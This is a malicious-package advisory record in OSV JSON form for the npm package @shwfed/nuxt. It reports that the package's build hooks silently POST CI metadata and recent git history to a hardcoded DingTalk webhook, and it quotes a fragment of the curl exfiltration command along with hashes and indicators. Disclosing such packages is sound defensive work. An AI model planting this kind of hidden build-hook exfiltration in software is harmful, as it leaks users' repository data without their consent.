{"id":"MAL-2026-4444","summary":"Malicious code in @shwfed/nuxt (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (87ac343d6f89a601749bb115fa6902e7d39c71a0a6469690ecef56e9ea8a135e)\n@shwfed/nuxt is published as a Nuxt UI module but contains undocumented build-hook code that, when a consumer integrates the module and runs a build under CI, POSTs the consumer's CI/build metadata and recent git history to a hardcoded third-party DingTalk webhook owned by the package author. In dist/module.mjs, the `build:error` and `build:done` Nuxt hooks invoke `execSync(\"curl -s -X POST '${url}'... -d @-\", { input: payload })` against `https://oapi.dingtalk.com/robot/send` with an embedded `access_token` (`a01e0fdf...`) and an embedded HMAC signing secret (`SEC9d852...`). The payload includes JOB_NAME, BUILD_NUMBER, branch name, RUN_DISPLAY_URL, build error message, the last 5 git log entries (commit subjects and author names) from the consumer's repository, and the last commit author. The destination is fixed in the source — not configurable, not documented, and unrelated to the module's advertised UI-component purpose. Any consumer that adds this module to their Nuxt config and runs CI builds leaks build status and recent git commit metadata (including third-party committer names) to the author's DingTalk channel without consent.\n","modified":"2026-06-12T20:01:52.624039665Z","published":"2026-05-22T03:05:41Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","sha256":"04c497e228a9ddf1560202c00b4a4a316bf4e44a76f032f35ac83da01ff5f866","import_time":"2026-05-26T05:52:53.122336759Z","id":"IN-MAL-2026-004583","modified_time":"2026-05-25T05:18:56Z","versions":["0.13.0"]},{"source":"amazon-inspector","sha256":"87ac343d6f89a601749bb115fa6902e7d39c71a0a6469690ecef56e9ea8a135e","import_time":"2026-05-26T05:51:59.368592186Z","id":"IN-MAL-2026-004127","modified_time":"2026-05-22T03:05:41Z","versions":["0.12.0"]},{"versions":["0.12.0"],"source":"amazon-inspector","sha256":"cc9864d615e6760cc4ce5f9037b93cb29a5f1c044cafa7736f7d3a953a42f6a4","import_time":"2026-05-26T05:51:59.474234203Z","id":"IN-MAL-2026-004128","modified_time":"2026-05-22T03:05:56Z"},{"source":"amazon-inspector","sha256":"0bf4290eabdf1af188406fbba698fba9e3d85b7a976bd5cc6fb77b862c0c1b2e","import_time":"2026-05-26T05:52:53.019303786Z","id":"IN-MAL-2026-004582","modified_time":"2026-05-25T05:18:52Z","versions":["0.13.0"]},{"import_time":"2026-06-12T19:44:14.247531069Z","id":"IN-MAL-2026-006155","modified_time":"2026-06-12T19:10:05Z","versions":["0.13.1"],"source":"amazon-inspector","sha256":"3336b06325a199568cd0fffee2cec27695d7e49be7d5cb333bcb3569ff846aec"},{"modified_time":"2026-06-12T19:10:05Z","versions":["0.13.1"],"source":"amazon-inspector","sha256":"63b019ca84778d17faf6bd57d455e1af9c7a07535d8cba7f69456d14e81419b2","import_time":"2026-06-12T19:44:14.153049153Z","id":"IN-MAL-2026-006154"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@shwfed/nuxt/v/0.12.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@shwfed/nuxt/v/0.13.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/@shwfed/nuxt/v/0.13.1"}],"affected":[{"package":{"name":"@shwfed/nuxt","ecosystem":"npm","purl":"pkg:npm/%40shwfed%2Fnuxt"},"versions":["0.13.0","0.12.0","0.13.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@shwfed/nuxt/MAL-2026-4444.json","indicators":{"domains":["34.3.16.104.in-addr.arpa"],"evidence_files":[{"path":"dist/module.mjs","sha256":"2d91b00b8b9a6d98315e3559a46c4ee852785dcb69d0af5ef0f97219878948ab","tlsh":"2ff1b71995a3352505f35911ab37280317be66436602fc14bf9e97d13f0f3a662f638d"}],"package_integrity":[{"filename":"nuxt-0.12.0.tgz","hashes":{"sha512_sri":"sha512-I3QnOJgcJDni1yqr6e6HLxUtQwe9UPgoB/npYBSe7+x+3y9hI9yPbRjaTRwg536ymyXOU93blW7T9OJVmLUrlQ==","sha1":"2f6f7fb399d474dfd939876957be932a3de2c5db"}}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com","inspector-research@amazon.com"],"type":"FINDER"}]}